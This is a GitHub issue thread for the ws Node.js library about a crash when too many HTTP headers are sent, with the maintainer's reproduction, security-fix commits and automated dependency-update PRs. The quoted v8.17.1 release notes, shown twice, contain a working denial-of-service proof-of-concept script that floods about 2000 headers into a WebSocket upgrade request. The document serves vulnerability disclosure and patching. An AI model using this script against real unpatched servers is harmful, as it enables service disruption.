Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Throws TypeError when there are too many HTTP headers #2230

Closed
1 task done
rrlapointe opened this issue Jun 15, 2024 · 3 comments · Fixed by #2231
Closed
1 task done

Throws TypeError when there are too many HTTP headers #2230

rrlapointe opened this issue Jun 15, 2024 · 3 comments · Fixed by #2231

Comments

@rrlapointe
Copy link

Is there an existing issue for this?

  • I've searched for any related issues and avoided creating a duplicate issue.

Description

I use this package for a websocket server. In the process of changing some options to try to make my websocket server slightly more resistant to DoS, I lowered the maxHeadersCount field on the HTTP server from its default of 2000 to a lower value. I then tested to see whether the server would reject requests with too many headers. Instead, the server crashed due to a TypeError from websocket-server.js line 246. This seems like a DoS issue.

I found this similar issue: #1838

ws version

8.17.0

Node.js Version

v21.5.0

System

OS: Debian GNU/Linux 12 (bookworm)
CPU: x64 Intel Core i5 CPU
Memory: 2.62 GB / 6.58 GB
Container: Yes
Shell: /bin/bash

Expected result

I expected the websocket server to refuse the handshake. Maybe respond with a 400 Bad Request. I did not expect my server app to crash from a TypeError.

Actual result

webpack://somewhere/node_modules/ws/lib/websocket-server.js:246
    if (req.headers.upgrade.toLowerCase() !== 'websocket') {
                            ^


TypeError: Cannot read properties of undefined (reading 'toLowerCase')
    at handleUpgrade (webpack://somewhere/node_modules/ws/lib/websocket-server.js:246:29)
    at Server.upgrade (webpack://somewhere/node_modules/ws/lib/websocket-server.js:119:16)
    at Server.emit (node:events:519:28)
    at onParserExecuteCommon (node:_http_server:942:14)
    at onParserExecute (node:_http_server:836:3)

Node.js v21.5.0

Attachments

No response
@lpinca
Copy link
Member

lpinca commented Jun 15, 2024
edited
Loading

Please create a minimal reproducible test case using only ws. As per #1838 (comment), #1838 (comment) and #1838 (comment) it cannot happen unless ws is incorrectly used.

If the server 'upgrade' event is emitted without the Upgrade header then the bug is in Node.js core.

@lpinca
Copy link
Member

lpinca commented Jun 15, 2024
edited
Loading

Here is a test case to reproduce the issue using only Node.js core modules.

const http = require('http');

const server = http.createServer();

server.maxHeadersCount = 1;

server.on('upgrade', function (request) {
  console.log(request.headers);
});

server.listen(function () {
  const { port } = server.address();
  const request = http.request({
    headers: {
      foo: 'foo',
      bar: 'bar',
      baz: 'baz',
      qux: 'qux',
      connection: 'Upgrade',
      upgrade: 'protocol'
    },
    host: '127.0.0.1',
    port
  });

  request.end();
});

The 'upgrade' event is emitted even if server.maxHeadersCount is set to 1. It seems that setting the property does not abort the request. If it is the expected behavior, I wonder what is the purpose of setting that limit.

lpinca added a commit that referenced this issue Jun 15, 2024
@lpinca
[fix] Abort the handshake if the Upgrade header cannot be validated
e009fc7 
If the number of headers exceed the `maxHeadersCount` threshold,
`incomingMessage.headers.upgrade` can be `undefined`. Handle the case
correctly and abort the handshake.

Fixes #2230
@lpinca lpinca mentioned this issue Jun 15, 2024
Merged
@lpinca
Copy link
Member

lpinca commented Jun 15, 2024

See #2231.

lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read
dec10b6 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
@lpinca lpinca closed this as completed in fac8994 Jun 16, 2024
lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read (#2231)
e55e510 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read (#2231)
4abd8f6 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read (#2231)
85783fb 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read (#2231)
22c2876 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
lpinca added a commit that referenced this issue Jun 16, 2024
@lpinca
[security] Fix crash when the Upgrade header cannot be read (#2231)
eeb76d3 
It is possible that the Upgrade header is correctly received and handled
(the `'upgrade'` event is emitted) without its value being returned to
the user. This can happen if the number of received headers exceed the
`server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this
case `incomingMessage.headers.upgrade` may not be set.

Handle the case correctly and abort the handshake.

Fixes #2230
kodiakhq bot referenced this issue in X-oss-byte/Canary-nextjs Jun 17, 2024
@renovate
Update dependency ws to v8.17.1 (#1080)
c540af8 
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).
kodiakhq bot referenced this issue in X-oss-byte/Nextjs Jun 17, 2024
@renovate
Update dependency ws to v8.17.1 (#2122)
11b08e2 
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

### [`v8.17.0`](https://togithub.com/websockets/ws/releases/tag/8.17.0)

[Compare Source](https://togithub.com/websockets/ws/compare/8.16.0...8.17.0)

### Features

-   The `WebSocket` constructor now accepts the `createConnection` option ([#&#8203;2219](https://togithub.com/websockets/ws/issues/2219)).

### Other notable changes

-   The default value of the `allowSynchronousEvents` option has been changed to
    `true` ([#&#8203;2221](https://togithub.com/websockets/ws/issues/2221)).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
@MilkaChucky MilkaChucky mentioned this issue Jun 18, 2024
Merged
kodiakhq bot referenced this issue in weareinreach/TransMascFutures Jun 18, 2024
@kodiakhq @renovate
fix(deps): update all non-major dependencies (#436)
40957c4 
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Type | Update | Change | OpenSSF |
|---|---|---|---|---|
| [@prisma/adapter-neon](https://togithub.com/prisma/prisma) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/adapter-neon)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fadapter-neon/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [@prisma/client](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [@storybook/addon-a11y](https://togithub.com/storybookjs/storybook/tree/next/code/addons/a11y) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/a11y)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/next/code/addons/essentials) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/essentials)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/next/code/addons/interactions) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/interactions)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/next/code/addons/links) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/links)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/addon-viewport](https://togithub.com/storybookjs/storybook/tree/next/code/addons/viewport) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/viewport)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/blocks](https://togithub.com/storybookjs/storybook/tree/next/code/ui/blocks) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/ui/blocks)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/nextjs](https://togithub.com/storybookjs/storybook/tree/next/code/frameworks/nextjs) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/frameworks/nextjs)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/react](https://togithub.com/storybookjs/storybook/tree/next/code/renderers/react) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/renderers/react)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@storybook/test](https://togithub.com/storybookjs/storybook/tree/next/code/lib/test) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/test)) | dependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2ftest/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | devDependencies | patch | [`20.14.2` -> `20.14.5`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.2/20.14.5) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/DefinitelyTyped/DefinitelyTyped/badge)](https://securityscorecards.dev/viewer/?uri=github.com/DefinitelyTyped/DefinitelyTyped) |
| [@typescript-eslint/eslint-plugin](https://typescript-eslint.io/packages/eslint-plugin) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/eslint-plugin)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2feslint-plugin/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) |
| [@typescript-eslint/parser](https://typescript-eslint.io/packages/parser) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2fparser/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) |
| [knip](https://knip.dev) ([source](https://togithub.com/webpro-nl/knip/tree/HEAD/packages/knip)) | devDependencies | minor | [`5.19.0` -> `5.21.2`](https://renovatebot.com/diffs/npm/knip/5.19.0/5.21.2) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/webpro-nl/knip/badge)](https://securityscorecards.dev/viewer/?uri=github.com/webpro-nl/knip) |
| [nextjs-routes](https://togithub.com/tatethurston/nextjs-routes) | dependencies | patch | [`2.2.0` -> `2.2.1`](https://renovatebot.com/diffs/npm/nextjs-routes/2.2.0/2.2.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/tatethurston/nextjs-routes/badge)](https://securityscorecards.dev/viewer/?uri=github.com/tatethurston/nextjs-routes) |
| [pnpm](https://pnpm.io) ([source](https://togithub.com/pnpm/pnpm)) | packageManager | minor | [`9.3.0` -> `9.4.0`](https://renovatebot.com/diffs/npm/pnpm/9.3.0/9.4.0) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/pnpm/pnpm/badge)](https://securityscorecards.dev/viewer/?uri=github.com/pnpm/pnpm) |
| [prisma](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli)) | devDependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/prisma/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) |
| [storybook](https://togithub.com/storybookjs/storybook/tree/next/code/lib/cli) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/cli)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/storybook/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) |
| [tsx](https://tsx.is) ([source](https://togithub.com/privatenumber/tsx)) | devDependencies | patch | [`4.15.4` -> `4.15.6`](https://renovatebot.com/diffs/npm/tsx/4.15.4/4.15.6) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/privatenumber/tsx/badge)](https://securityscorecards.dev/viewer/?uri=github.com/privatenumber/tsx) |
| [type-fest](https://togithub.com/sindresorhus/type-fest) | devDependencies | patch | [`4.20.0` -> `4.20.1`](https://renovatebot.com/diffs/npm/type-fest/4.20.0/4.20.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sindresorhus/type-fest/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sindresorhus/type-fest) |
| [ws](https://togithub.com/websockets/ws) | dependencies | patch | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/websockets/ws/badge)](https://securityscorecards.dev/viewer/?uri=github.com/websockets/ws) |

---

### Release Notes

<details>
<summary>prisma/prisma (@&#8203;prisma/adapter-neon)</summary>

### [`v5.15.1`](https://togithub.com/prisma/prisma/releases/tag/5.15.1)

[Compare Source](https://togithub.com/prisma/prisma/compare/5.15.0...5.15.1)

Today, we are issuing the `5.15.1` patch release.

#### Fixes in Prisma Client

-   [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/23407)
-   [Got error 'internal error: entered unreachable code' when trying to perform an upsert.](https://togithub.com/prisma/prisma/issues/22947)
-   [Prisma Client errors on SQLite with internal error: entered unreachable code when running 2 concurrent upsert ](https://togithub.com/prisma/prisma/issues/22725)
-   [`ConnectionError(Timed out during query execution.)` during seeding](https://togithub.com/prisma/prisma/issues/21772)
-   [SQLite timeouts after upgrade from prisma 2 to prisma 4](https://togithub.com/prisma/prisma/issues/17029)
-   [`ConnectionError(Timed out during query execution.)` error when using `Promise.all` for SQLite](https://togithub.com/prisma/prisma/issues/11789)
-   [Improve the error when SQLite database file is locked](https://togithub.com/prisma/prisma/issues/10403)
-   [sqlite timeout error multiple queries run one after another](https://togithub.com/prisma/prisma/issues/10306)
-   [SQLite times out during query execution when using `Promise.all()` / concurrent](https://togithub.com/prisma/prisma/issues/9562)
-   [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/24511)

</details>

<details>
<summary>storybookjs/storybook (@&#8203;storybook/addon-a11y)</summary>

### [`v8.1.10`](https://togithub.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#8110)

[Compare Source](https://togithub.com/storybookjs/storybook/compare/v8.1.9...v8.1.10)

-   Addon-interactions: Fix deprecation warnings - [#&#8203;28250](https://togithub.com/storybookjs/storybook/pull/28250), thanks [@&#8203;shilman](https://togithub.com/shilman)!
-   Test: Upgrade deps of [@&#8203;storybook/test](https://togithub.com/storybook/test) - [#&#8203;27862](https://togithub.com/storybookjs/storybook/pull/27862), thanks [@&#8203;kasperpeulen](https://togithub.com/kasperpeulen)!

</details>

<details>
<summary>typescript-eslint/typescript-eslint (@&#8203;typescript-eslint/eslint-plugin)</summary>

### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/eslint-plugin/CHANGELOG.md#7131-2024-06-17)

[Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1)

##### 🩹 Fixes

-   **eslint-plugin:** \[prefer-readonly] refine report locations

-   **eslint-plugin:** \[return-await] support explicit resource management

-   **eslint-plugin:** \[no-unsafe-member-access] differentiate a types-error any from a true any

##### ❤️  Thank You

-   Kirk Waiblinger
-   Yukihiro Hasegawa

You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website.

</details>

<details>
<summary>typescript-eslint/typescript-eslint (@&#8203;typescript-eslint/parser)</summary>

### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/parser/CHANGELOG.md#7131-2024-06-17)

[Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1)

This was a version bump only for parser to align it with other projects, there were no code changes.

You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website.

</details>

<details>
<summary>webpro-nl/knip (knip)</summary>

### [`v5.21.2`](https://togithub.com/webpro-nl/knip/compare/5.21.1...bd77bcce5acfdd108ab54398c922eb03f07fc65f)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.1...5.21.2)

### [`v5.21.1`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.1)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.0...5.21.1)

-   Fix lockfile-lint config filename ([#&#8203;683](https://togithub.com/webpro-nl/knip/issues/683)) ([`f5304b6`](https://togithub.com/webpro-nl/knip/commit/f5304b6d))
-   feat: add command to ignored binaries ([#&#8203;682](https://togithub.com/webpro-nl/knip/issues/682)) ([`d049b6c`](https://togithub.com/webpro-nl/knip/commit/d049b6c4))
-   Add (custom) og img for sponsors page ([`d89ec12`](https://togithub.com/webpro-nl/knip/commit/d89ec129))
-   Rename `NOT_FOUND` to `KNIP_ADDED` workspace names ([`3a41f8e`](https://togithub.com/webpro-nl/knip/commit/3a41f8ec))

### [`v5.21.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.0)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.20.0...5.21.0)

-   Add webdriver-io plugin ([`7414dc1`](https://togithub.com/webpro-nl/knip/commit/7414dc1a))
-   Update plugin docs ([`df35b9f`](https://togithub.com/webpro-nl/knip/commit/df35b9f4))
-   Minor housekeeping ([`1422c9d`](https://togithub.com/webpro-nl/knip/commit/1422c9d2))
-   Add size-limit plugin ([`dbd82f8`](https://togithub.com/webpro-nl/knip/commit/dbd82f87))
-   Add lockfile-lint plugin ([`d70d0de`](https://togithub.com/webpro-nl/knip/commit/d70d0de7))
-   Use provided name in plugin template ([`43961f9`](https://togithub.com/webpro-nl/knip/commit/43961f91))
-   Minor housekeeping ([`c81b1a2`](https://togithub.com/webpro-nl/knip/commit/c81b1a23))
-   Update readme with badges and stuff ([`c18fcba`](https://togithub.com/webpro-nl/knip/commit/c18fcba5))
-   Update docs (Configuring Project Files) ([`e10ac2e`](https://togithub.com/webpro-nl/knip/commit/e10ac2e4))

### [`v5.20.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.20.0)

[Compare Source](https://togithub.com/webpro-nl/knip/compare/5.19.0...5.20.0)

-   Lockfile ([`e929847`](https://togithub.com/webpro-nl/knip/commit/e9298477))
-   Edit doc ([`5afaac4`](https://togithub.com/webpro-nl/knip/commit/5afaac44))
-   More consistent usage of fg ([`25cbba0`](https://togithub.com/webpro-nl/knip/commit/25cbba0a))
-   Eliminiate custom TS System instance ([#&#8203;680](https://togithub.com/webpro-nl/knip/issues/680)) ([`d7325c6`](https://togithub.com/webpro-nl/knip/commit/d7325c69))
-   Go against the grain in the cypress plugin ([`ef2464d`](https://togithub.com/webpro-nl/knip/commit/ef2464d5))
-   Remove duplicate code ([`6a17ad2`](https://togithub.com/webpro-nl/knip/commit/6a17ad29))
-   Add simple-git-hooks plugin ([#&#8203;679](https://togithub.com/webpro-nl/knip/issues/679)) ([`9129af7`](https://togithub.com/webpro-nl/knip/commit/9129af70))
-   Add missing `root` property to vitest ([#&#8203;677](https://togithub.com/webpro-nl/knip/issues/677)) ([`6797bf8`](https://togithub.com/webpro-nl/knip/commit/6797bf8d))
